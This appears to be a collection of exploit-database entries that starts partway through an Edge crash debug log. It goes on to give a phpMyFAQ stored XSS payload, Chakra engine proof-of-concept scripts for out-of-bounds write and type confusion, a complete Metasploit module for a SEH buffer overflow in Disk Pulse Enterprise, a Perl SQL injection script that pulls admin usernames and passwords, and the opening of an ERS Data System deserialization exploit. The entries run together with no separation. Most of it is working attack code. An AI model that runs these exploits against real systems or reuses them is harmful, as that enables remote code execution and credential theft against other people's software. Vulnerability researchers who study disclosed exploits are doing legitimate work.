0c 00000091`94ffbb20 00007ffa`c8e77273 0x000001b6`4f600fb2
0d 00000091`94ffbb50 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
0e 00000091`94ffbba0 00007ffa`c8d88260 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
0f 00000091`94ffbc00 00007ffa`c8d8ccfd chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
10 00000091`94ffbc50 00007ffa`c8d8c8b7 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
11 00000091`94ffbce0 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x1a7
12 00000091`94ffbd40 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
13 00000091`94ffc090 000001b6`4f600fba chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
14 00000091`94ffc0e0 00007ffa`c8e77273 0x000001b6`4f600fba
15 00000091`94ffc110 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
16 00000091`94ffc160 00007ffa`c8dba4bc chakra!Js::JavascriptFunction::CallFunction<1>+0x83
17 00000091`94ffc1c0 00007ffa`c8db9a86 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
18 00000091`94ffc2b0 00007ffa`c8e5c359 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
19 00000091`94ffc320 00007ffa`c8dbff21 chakra!ScriptSite::CallRootFunction+0xb5
1a 00000091`94ffc3c0 00007ffa`c8dbbadc chakra!ScriptSite::Execute+0x131
1b 00000091`94ffc450 00007ffa`c97d08dd chakra!ScriptEngineBase::Execute+0xcc
1c 00000091`94ffc4f0 00007ffa`c97d0828 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
1d 00000091`94ffc540 00007ffa`c970a8c7 edgehtml!CJScript9Holder::ExecuteCallback+0x18
1e 00000091`94ffc580 00007ffa`c970a6b7 edgehtml!CListenerDispatch::InvokeVar+0x1fb
1f 00000091`94ffc700 00007ffa`c97cf22a edgehtml!CListenerDispatch::Invoke+0xdb
20 00000091`94ffc780 00007ffa`c98a40d2 edgehtml!CEventMgr::_InvokeListeners+0x2ca
21 00000091`94ffc8e0 00007ffa`c9720ac5 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
22 00000091`94ffc910 00007ffa`c9720553 edgehtml!CEventMgr::Dispatch+0x405
23 00000091`94ffcbe0 00007ffa`c97fd8da edgehtml!CEventMgr::DispatchEvent+0x73
24 00000091`94ffcc30 00007ffa`c983ba12 edgehtml!COmWindowProxy::Fire_onload+0x14e
25 00000091`94ffcd40 00007ffa`c983a6a6 edgehtml!CMarkup::OnLoadStatusDone+0x376
26 00000091`94ffce00 00007ffa`c983a21f edgehtml!CMarkup::OnLoadStatus+0x112
27 00000091`94ffce30 00007ffa`c97c5b43 edgehtml!CProgSink::DoUpdate+0x3af
28 00000091`94ffd2c0 00007ffa`c97c7300 edgehtml!GlobalWndOnMethodCall+0x273
29 00000091`94ffd3c0 00007ffa`e7571c24 edgehtml!GlobalWndProc+0x130
2a 00000091`94ffd480 00007ffa`e757156c user32!UserCallWinProcCheckWow+0x274
2b 00000091`94ffd5e0 00007ffa`c0d2cdf1 user32!DispatchMessageWorker+0x1ac
2c 00000091`94ffd660 00007ffa`c0d2c3b1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
2d 00000091`94fff8b0 00007ffa`dd649596 EdgeContent!LCIETab_ThreadProc+0x2c1
2e 00000091`94fff9d0 00007ffa`e4f58364 iertutil!SettingStore::CSettingsBroker::SetValue+0x246
2f 00000091`94fffa00 00007ffa`e77d70d1 KERNEL32!BaseThreadInitThunk+0x14
30 00000091`94fffa30 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:010> r
rax=000001b652742fe0 rbx=0000000000000004 rcx=000001b64f877f30
rdx=0000000000000004 rsi=0000000000000000 rdi=000001b651ecffd0
rip=00007ffac96b1581 rsp=0000009194ffb2c0 rbp=000001b64f3bcc60
r8=0000000000000005 r9=000001b651ed9e50 r10=0000000000000005
r11=000001b65343ef20 r12=0000009194ffb370 r13=0001000000000004
r14=0000000000000000 r15=0000000000000004
iopl=0 nv up ei ng nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
edgehtml!COptionsCollectionCacheItem::GetAt+0x51:
00007ffa`c96b1581 488b04d0 mov rax,qword ptr [rax+rdx*8] ds:000001b6`52743000=????????????????
0:010> !heap -p -a 000001b6`52742ff0
address 000001b652742ff0 found in
_DPH_HEAP_ROOT @ 1ae3fae1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1b652a5fd68: 1b652742fe0 20 - 1b652742000 2000
00007ffae783fd99 ntdll!RtlDebugAllocateHeap+0x000000000003bf65
00007ffae782db7c ntdll!RtlpAllocateHeap+0x0000000000083fbc
00007ffae77a8097 ntdll!RtlpAllocateHeapInternal+0x0000000000000727
00007ffac9958547 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x0000000000010457
00007ffac96d1483 edgehtml!CImplAry::EnsureSizeWorker+0x0000000000000093
00007ffac9882261 edgehtml!CImplPtrAry::Append+0x0000000000000051
00007ffac9589543 edgehtml!CSelectElement::AppendOption+0x000000000000002f
00007ffac95892e1 edgehtml!CSelectElement::BuildOptionsCache+0x00000000000000e1
00007ffac9e7f044 edgehtml!CSelectElement::Morph+0x00000000000000d0
00007ffac9a4e7cf edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x00000000001066df
00007ffac9605f85 edgehtml!SetNumberPropertyHelper<long,CSetIntegerPropertyHelper>+0x0000000000000255
00007ffac9605d23 edgehtml!NUMPROPPARAMS::SetNumberProperty+0x000000000000003b
00007ffac9605bda edgehtml!CBase::put_BoolHelper+0x000000000000004a
00007ffac9c6f1d1 edgehtml!CFastDOM::CHTMLSelectElement::Trampoline_Set_multiple+0x000000000000013d
00007ffac9916b55 edgehtml!CFastDOM::CHTMLSelectElement::Profiler_Set_multiple+0x0000000000000025
00007ffac8ce6d07 chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x0000000000000177
00007ffac8dc2640 chakra!Js::LeaveScriptObject<1,1,0>::LeaveScriptObject<1,1,0>+0x0000000000000180
00007ffac8e62209 chakra!Js::JavascriptOperators::CallSetter+0x00000000000000a9
00007ffac8de7151 chakra!Js::CacheOperators::TrySetProperty<1,1,1,1,1,1,0,1>+0x00000000000002d1
00007ffac8de6ce6 chakra!Js::ProfilingHelpers::ProfiledStFld<0>+0x00000000000000d6
00007ffac8d89a70 chakra!Js::InterpreterStackFrame::OP_ProfiledSetProperty<Js::OpLayoutT_ElementCP<Js::LayoutSizePolicy<0> > const >+0x0000000000000070
00007ffac8d8e800 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x0000000000000340
00007ffac8d8c852 chakra!Js::InterpreterStackFrame::Process+0x0000000000000142
00007ffac8d90920 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x00000000000004a0
00007ffac8d92065 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x0000000000000055
000001b64f600fb2 +0x000001b64f600fb2
=========================================
-->
# Exploit Title: phpMyFAQ 2.9.8 Stored XSS
# Vendor Homepage: http://www.phpmyfaq.de/
# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: webapps
# CVE: CVE-2017-14618
1. Description
Cross-site scripting (XSS) vulnerability in inc/PMF/Faq.php in phpMyFAQ
through 2.9.8 allows remote attackers to inject arbitrary web script or
HTML via the Questions field in an "Add New FAQ" action.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14618
https://securityprince.blogspot.fr/2017/10/cve-2017-14618-phpmyfaq-298-cross-site.html
2. Proof of Concept
Steps to Reproduce:
1. Open the affected link "
http://localhost/phpmyfaq/admin/?action=editentry" with logged in user
with administrator privileges
2. Enter the <a onmouseover=alert(document.cookie)>xss link</a> in the
“Questions”
3. Save the FAQ
4. Login using any other user or simply click on the phpMyFAQ on the
top-right hand side of the web portal
5. Click on the latest FAQ added
6. Hover around the name "xss link"
3. Solution:
This vulnerability will be fixed in phpMyFAQ 2.9.9
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1309
There is a security issue in Microsoft Edge related to how HTML documents are loaded. If Edge displays a HTML document from a slow HTTP server, it is possible that a part of the document is going to be rendered before the server has finished sending the document. It is also possible that some JavaScript code is going to trigger.
By making DOM modifications before the document had a chance of fully loading, followed by another set of DOM modifications afer the page has been loaded, it is possible to trigger memory corruption that could possibly lead to an exploitable condition.
A debug log is included below. Note that the crash RIP directly preceeds a (CFG-protected) indirect call, which demonstrates the exploitability of the issue.
Since a custom HTTP server is needed to demonstrate the issue, I'm attaching all of the required code. Simply run server.py and point Edge to http://127.0.0.1:8000/
Note: this has been tested on Microsoft Edge 38.14393.1066.0 (Microsoft EdgeHTML 14.14393)
Debug log:
=========================================
(a68.9c0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx] ds:00000000`abcdbbbb=????????????????
0:013> k
# Child-SP RetAddr Call Site
00 000000eb`c42f8da0 00007ffa`9d8b243d edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa
01 000000eb`c42f8dd0 00007ffa`9d8b28e2 edgehtml!Collections::SGrowingArray<TSmartPointer<Tree::ANode,CStrongReferenceTraits> >::DeleteAt+0x89
02 000000eb`c42f8e00 00007ffa`9d8b0cd7 edgehtml!Undo::UndoNodeList::RemoveNodesCompletelyContained+0x5e
03 000000eb`c42f8e30 00007ffa`9d8ad79b edgehtml!Undo::WrapUnwrapNodeUndoUnit::RemoveNodesAtOldPosition+0x33
04 000000eb`c42f8e70 00007ffa`9d5b303d edgehtml!Undo::MoveForestUndoUnit::HandleWrapUnwrap+0x6b
05 000000eb`c42f8f10 00007ffa`9d8ac629 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xfa3fd
06 000000eb`c42f8f60 00007ffa`9d5b3085 edgehtml!Undo::ParentUndoUnit::ApplyScriptedOperationToChildren+0xb5
07 000000eb`c42f8ff0 00007ffa`9d11035c edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xfa445
08 000000eb`c42f9040 00007ffa`9d110125 edgehtml!Undo::UndoManager::ApplyScriptedOperationsToUserUnits+0x11c
09 000000eb`c42f9130 00007ffa`9d1d6f0d edgehtml!Undo::UndoManager::SubmitUndoUnit+0x125
0a 000000eb`c42f9170 00007ffa`9dc9c9ae edgehtml!CSelectionManager::CreateAndSubmitSelectionUndoUnit+0x141
0b 000000eb`c42f9200 00007ffa`9dc90b70 edgehtml!CRemoveFormatBaseCommand::PrivateExec+0xae
0c 000000eb`c42f92c0 00007ffa`9dc9057a edgehtml!CCommand::Exec+0xe8
0d 000000eb`c42f9350 00007ffa`9d55e481 edgehtml!CMshtmlEd::Exec+0x17a
0e 000000eb`c42f93b0 00007ffa`9d39cc34 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xa5841
0f 000000eb`c42f9470 00007ffa`9d21d6a1 edgehtml!CDoc::ExecHelper+0x5d18
10 000000eb`c42fb020 00007ffa`9d1dbb57 edgehtml!CDocument::Exec+0x41
11 000000eb`c42fb070 00007ffa`9d1dba25 edgehtml!CBase::execCommand+0xc7
12 000000eb`c42fb0f0 00007ffa`9d1db8ac edgehtml!CDocument::execCommand+0x105
13 000000eb`c42fb2e0 00007ffa`9d498155 edgehtml!CFastDOM::CDocument::Trampoline_execCommand+0x124
14 000000eb`c42fb3f0 00007ffa`9c930e37 edgehtml!CFastDOM::CDocument::Profiler_execCommand+0x25
15 000000eb`c42fb420 00007ffa`9c9e9073 chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x177
16 000000eb`c42fb500 00007ffa`9c9596cd chakra!amd64_CallFunction+0x93
17 000000eb`c42fb560 00007ffa`9c95cec7 chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > > >+0x15d
18 000000eb`c42fb600 00007ffa`9c960f52 chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > >+0xa7
19 000000eb`c42fb680 00007ffa`9c95f1b2 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x132
1a 000000eb`c42fb710 00007ffa`9c963280 chakra!Js::InterpreterStackFrame::Process+0x142
1b 000000eb`c42fb770 00007ffa`9c9649c5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
1c 000000eb`c42fbad0 00000284`bf4b0fa2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
1d 000000eb`c42fbb20 00007ffa`9c9e9073 0x00000284`bf4b0fa2
1e 000000eb`c42fbb50 00007ffa`9c9580c3 chakra!amd64_CallFunction+0x93
1f 000000eb`c42fbba0 00007ffa`9c95abc0 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
20 000000eb`c42fbc00 00007ffa`9c95f65d chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
21 000000eb`c42fbc50 00007ffa`9c95f217 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
22 000000eb`c42fbce0 00007ffa`9c963280 chakra!Js::InterpreterStackFrame::Process+0x1a7
23 000000eb`c42fbd40 00007ffa`9c9649c5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
24 000000eb`c42fc090 00000284`bf4b0faa chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
25 000000eb`c42fc0e0 00007ffa`9c9e9073 0x00000284`bf4b0faa
26 000000eb`c42fc110 00007ffa`9c9580c3 chakra!amd64_CallFunction+0x93
27 000000eb`c42fc160 00007ffa`9c98ce3c chakra!Js::JavascriptFunction::CallFunction<1>+0x83
28 000000eb`c42fc1c0 00007ffa`9c98c406 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
29 000000eb`c42fc2b0 00007ffa`9c9ce4d9 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
2a 000000eb`c42fc320 00007ffa`9c9928a1 chakra!ScriptSite::CallRootFunction+0xb5
2b 000000eb`c42fc3c0 00007ffa`9c98e45c chakra!ScriptSite::Execute+0x131
2c 000000eb`c42fc450 00007ffa`9d333b2d chakra!ScriptEngineBase::Execute+0xcc
2d 000000eb`c42fc4f0 00007ffa`9d333a78 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
2e 000000eb`c42fc540 00007ffa`9d35ac27 edgehtml!CJScript9Holder::ExecuteCallback+0x18
2f 000000eb`c42fc580 00007ffa`9d35aa17 edgehtml!CListenerDispatch::InvokeVar+0x1fb
30 000000eb`c42fc700 00007ffa`9d33247a edgehtml!CListenerDispatch::Invoke+0xdb
31 000000eb`c42fc780 00007ffa`9d415a62 edgehtml!CEventMgr::_InvokeListeners+0x2ca
32 000000eb`c42fc8e0 00007ffa`9d290715 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
33 000000eb`c42fc910 00007ffa`9d2901a3 edgehtml!CEventMgr::Dispatch+0x405
34 000000eb`c42fcbe0 00007ffa`9d37434a edgehtml!CEventMgr::DispatchEvent+0x73
35 000000eb`c42fcc30 00007ffa`9d3ac5a2 edgehtml!COmWindowProxy::Fire_onload+0x14e
36 000000eb`c42fcd40 00007ffa`9d3ab23e edgehtml!CMarkup::OnLoadStatusDone+0x376
37 000000eb`c42fce00 00007ffa`9d3aa72f edgehtml!CMarkup::OnLoadStatus+0x112
38 000000eb`c42fce30 00007ffa`9d328d93 edgehtml!CProgSink::DoUpdate+0x3af
39 000000eb`c42fd2c0 00007ffa`9d32a550 edgehtml!GlobalWndOnMethodCall+0x273
3a 000000eb`c42fd3c0 00007ffa`b7a31c24 edgehtml!GlobalWndProc+0x130
3b 000000eb`c42fd480 00007ffa`b7a3156c user32!UserCallWinProcCheckWow+0x274
3c 000000eb`c42fd5e0 00007ffa`9347d421 user32!DispatchMessageWorker+0x1ac
3d 000000eb`c42fd660 00007ffa`9347c9e1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
3e 000000eb`c42ff8b0 00007ffa`ad7e9586 EdgeContent!LCIETab_ThreadProc+0x2c1
3f 000000eb`c42ff9d0 00007ffa`b7978364 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16
40 000000eb`c42ffa00 00007ffa`ba0a70d1 KERNEL32!BaseThreadInitThunk+0x14
41 000000eb`c42ffa30 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:013> r
rax=00000284bc287fd8 rbx=00000284bc287f90 rcx=00000000abcdbbbb
rdx=0000000000000000 rsi=0000000000000017 rdi=0000000000000000
rip=00007ffa9d5f15ea rsp=000000ebc42f8da0 rbp=000000ebc42f8fb0
r8=0000000000000017 r9=000000ebc42f8e78 r10=00000fff53a47750
r11=0000000000010000 r12=0000027cb4fbcd10 r13=0000027cb4f95a78
r14=000000ebc42f8e70 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx] ds:00000000`abcdbbbb=????????????????
0:013> u 00007ffa`9d5f15ea
edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx]
00007ffa`9d5f15ed 488b80d0050000 mov rax,qword ptr [rax+5D0h]
00007ffa`9d5f15f4 ff15c654ab00 call qword ptr [edgehtml!_guard_dispatch_icall_fptr (00007ffa`9e0a6ac0)]
=========================================
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42758.zip
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1310
(function f(a = (function () {
print(a);
with ({});
})()) {
function g() {
f;
}
})();
When Chakra executes the above code, it doesn't generate bytecode for "g". This is a feature called "DeferParse". The problem is that the bytecode generated for "f" when the feature is enabled is different to the bytecode generated when the feature is disabled. This is because of "ByteCodeGenerator::ProcessScopeWithCapturedSym" which changes the function expression scope's type is not called when the feature is enabled.
Here's a snippet of the method which emits an incorrect opcode.
void ByteCodeGenerator::LoadAllConstants(FuncInfo *funcInfo)
{
...
if (funcExprWithName)
{
if (funcInfo->GetFuncExprNameReference() ||
(funcInfo->funcExprScope && funcInfo->funcExprScope->GetIsObject()))
{
...
Js::RegSlot ldFuncExprDst = sym->GetLocation();
this->m_writer.Reg1(Js::OpCode::LdFuncExpr, ldFuncExprDst);
if (sym->IsInSlot(funcInfo))
{
Js::RegSlot scopeLocation;
AnalysisAssert(funcInfo->funcExprScope);
if (funcInfo->funcExprScope->GetIsObject())
{
scopeLocation = funcInfo->funcExprScope->GetLocation();
this->m_writer.Property(Js::OpCode::StFuncExpr, sym->GetLocation(), scopeLocation,
funcInfo->FindOrAddReferencedPropertyId(sym->GetPosition()));
}
else if (funcInfo->bodyScope->GetIsObject())
{
this->m_writer.ElementU(Js::OpCode::StLocalFuncExpr, sym->GetLocation(),
funcInfo->FindOrAddReferencedPropertyId(sym->GetPosition()));
}
else
{
Assert(sym->HasScopeSlot());
this->m_writer.SlotI1(Js::OpCode::StLocalSlot, sym->GetLocation(),
sym->GetScopeSlot() + Js::ScopeSlots::FirstSlotIndex);
}
}
...
}
}
...
}
As you can see, it only handles "funcExprScope->GetIsObject()" or "bodyScope->GetIsObject()" but not "paramScope->GetIsObject()".
Without the feature, there's no case that only "paramScope->GetIsObject()" returns true because "ByteCodeGenerator::ProcessScopeWithCapturedSym" for "f" is always called and makes "funcInfo->funcExprScope->GetIsObject()" return true.
But with the feature, the method is not called. So it ends up emitting an incorrect opcode "Js::OpCode::StLocalSlot".
The feature is enabled in Edge by default.
PoC:
-->
let h = function f(a0 = (function () {
a0;
a1;
a2;
a3;
a4;
a5;
a6;
a7 = 0x99999; // oob write
with ({});
})(), a1, a2, a3, a4, a5, a6, a7) {
function g() {
f;
}
};
for (let i = 0; i < 0x10000; i++) {
h();
}
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1326
In Javascript, the code executed by a direct call to eval shares the caller block's scopes. Chakra handles this from the parser. And there's a bug when it parses "eval" in a catch statement's param.
ParseNodePtr Parser::ParseCatch()
{
...
pnodeCatchScope = StartParseBlock<buildAST>(PnodeBlockType::Regular, isPattern ? ScopeType_CatchParamPattern : ScopeType_Catch);
...
ParseNodePtr pnodePattern = ParseDestructuredLiteral<buildAST>(tkLET, true /*isDecl*/, true /*topLevel*/, DIC_ForceErrorOnInitializer);
...
}
1. "pnodeCatchScope" is a temporary block used to create a scope, and it is not actually inserted into the AST.
2. If the parser meets "eval" in "ParseDestructuredLiteral", it calls "pnodeCatchScope->SetCallsEval".
3. But "pnodeCatchScope" is not inserted into the AST. So the bytecode generator doesn't know it calls "eval", and it can't create scopes properly.
PoC:
-->
function f() {
{
let i;
function g() {
i;
}
try {
throw 1;
} catch ({e = eval('dd')}) {
}
}
}
f();
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1308
When the Chakra's parser meets "{", at first, Chakra treats it as an object literal without distinguishing whether it will be an object literal(i.e., {a: 0x1234}) or an object pattern(i.e., {a} = {a: 1234}). After finishing to parse it using "Parser::ParseTerm", if it's an object pattern, Chakra converts it to an object pattern using the "ConvertObjectToObjectPattern" method.
The problem is that "Parser::ParseTerm" also parses ".", etc. using "ParsePostfixOperators" without proper checks. As a result, an invalid syntax(i.e., {b = 0x1111...}.c) can be parsed and "ConvertObjectToObjectPattern" will fail to convert it to an object pattern.
In the following PoC, "ConvertObjectToObjectPattern" skips "{b = 0x1111...}.c". So the object literal will have incorrect members(b = 0x1111, c = 0x2222), this leads to type confusion(Chakra will think "c" is a setter and try to call it).
PoC:
-->
function f() {
({
a: {
b = 0x1111,
c = 0x2222,
}.c = 0x3333
} = {});
}
f();
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1327
Here's the method used to re-parse asmjs modules.
void JavascriptFunction::ReparseAsmJsModule(ScriptFunction** functionRef)
{
ParseableFunctionInfo* functionInfo = (*functionRef)->GetParseableFunctionInfo();
Assert(functionInfo);
functionInfo->GetFunctionBody()->AddDeferParseAttribute();
functionInfo->GetFunctionBody()->ResetEntryPoint();
functionInfo->GetFunctionBody()->ResetInParams();
FunctionBody * funcBody = functionInfo->Parse(functionRef);
#if ENABLE_PROFILE_INFO
// This is the first call to the function, ensure dynamic profile info
funcBody->EnsureDynamicProfileInfo();
#endif
(*functionRef)->UpdateUndeferredBody(funcBody);
}
First, it resets the function body and then re-parses it. But it doesn't consider that "functionInfo->Parse(functionRef);" may throw an exception. So in the case, the function body remains reseted(invalid).
We can make it throw an exception simply by exhausting the stack.
PoC:
-->
function Module() {
'use asm';
function f() {
}
return f;
}
function recur() {
try {
recur();
} catch (e) {
Module(1);
}
}
recur();
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Disk Pulse Enterprise GET Buffer Overflow',
'Description' => %q(
This module exploits an SEH buffer overflow in Disk Pulse Enterprise
9.9.16. If a malicious user sends a crafted HTTP GET request
it is possible to execute a payload that would run under the Windows
NT AUTHORITY\SYSTEM account.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Chance Johnson', # msf module - albatross@loftwing.net
'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com
],
'References' =>
[
[ 'EDB', '42560' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'EncoderType' => "alpha_mixed",
'BadChars' => "\x00\x0a\x0d\x26"
},
'Targets' =>
[
[ 'Disk Pulse Enterprise 9.9.16',
{
'Ret' => 0x1013ADDD, # POP EDI POP ESI RET 04 -- libpal.dll
'Offset' => 2492
}]
],
'Privileged' => true,
'DisclosureDate' => 'Aug 25 2017',
'DefaultTarget' => 0))
register_options([Opt::RPORT(80)])
end
def check
res = send_request_cgi(
'uri' => '/',
'method' => 'GET'
)
if res && res.code == 200 && res.body =~ /Disk Pulse Enterprise v9\.9\.16/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Generating exploit...")
exp = payload.encoded
exp << 'A' * (target['Offset'] - payload.encoded.length) # buffer of trash until we get to offset
exp << generate_seh_record(target.ret)
exp << make_nops(10) # NOP sled to make sure we land on jmp to shellcode
exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to shellcode start
exp << 'B' * (5000 - exp.length) # padding
print_status("Sending exploit...")
send_request_cgi(
'uri' => '/../' + exp,
'method' => 'GET',
'host' => '4.2.2.2',
'connection' => 'keep-alive'
)
handler
disconnect
end
end
#!/usr/bin/perl -w
# # # # #
# Exploit Title: Stock Photo Selling Script 1.0 - SQL Injection
# Dork: N/A
# Date: 21.09.2017
# Vendor Homepage: http://sixthlife.net/
# Software Link: http://sixthlife.net/product/stock-photo-selling-website/
# Demo: http://www.photoreels.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "
################################################################################
#### ## ## ###### ### ## ##
## ## ## ## ## ## ## ### ##
## ## ## ## ## ## #### ##
## ######### ###### ## ## ## ## ##
## ## ## ## ######### ## ####
## ## ## ## ## ## ## ## ###
#### ## ## ###### ## ## ## ##
###### ######## ## ## ###### ### ## ##
## ## ## ### ## ## ## ## ## ### ##
## ## #### ## ## ## ## #### ##
###### ###### ## ## ## ## ## ## ## ## ##
## ## ## #### ## ######### ## ####
## ## ## ## ### ## ## ## ## ## ###
###### ######## ## ## ###### ## ## ## ##
Stock Photo Selling Script 1.0 - SQL Injection
################################################################################
";
use LWP::UserAgent;
print "\nInsert Target:[http://site.com/path/]: ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress.....\n";
print "\n";
$tt="tbl_configurations";
$cc="(/*!00007SELECT*/%20GROUP_CONCAT(0x3c74657874617265613e,0x557365726e616d653a,admin_name,0x2020202020,0x50617373776f72643a,admin_password,0x3c2f74657874617265613e%20SEPARATOR%200x3c62723e)%20/*!00007FROM*/%20".$tt.")";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0');
$host = $target . "photo_view.php?photo_sid=-d1fe173d08e959397adf34b1d77e88d7'%20%20/*!00007UNION*/(/*!00007SELECT*/%200x283129,0x283229,0x283329,".$cc.",0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629)--%20-";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/<textarea>(.*?)<\/textarea>/){
print "[+] Success !!!\n";
print "\n[+] Admin Detail : $1\n";
print "\n[+]$target/admin/index.php?mod=login\n";
print "\n";
}
else{print "\n[-]Not found.\n";
}
# Exploit Title: ERS Data System 1.8.1 Deserialize Vulnerability
# Google Dork: N/A
# Date: 9/21/2017
# Exploit Author: West Shepherd
# Vendor Homepage: http://www.ersdata.com
# Software Link: www.ersdata.com/downloads/ErsSetup.exe
# Version: 1.8.1.0
# Tested on: Windows 7 x86
# CVE : CVE-2017-14702
# Description:
# ERS Data System 1.8.1.0 allows remote attackers to execute arbitrary code, related to the use of
# com.branaghgroup.ecers.update.UpdateRequest deserialization.
# Exploitaiton:
# The ERS Data System thick client connects to the www.ersdata.com API via an unencrypted HTTP connection on TCP port 3311.
# To redirect requests from the thick client to the attacking machine, enable packet forwarding:
#!/bin/bash
#echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables -F INPUT
#iptables -F FORWARD
#iptables -F OUTPUT
#iptables -F -t nat
#iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
#iptables -t nat -A POSTROUTING -s 192.168.85.0/24 ! -d 192.168.85.0/24 -j MASQUERADE
#iptables -P INPUT ACCEPT
#iptables -P FORWARD ACCEPT
#iptables -P OUTPUT ACCEPT
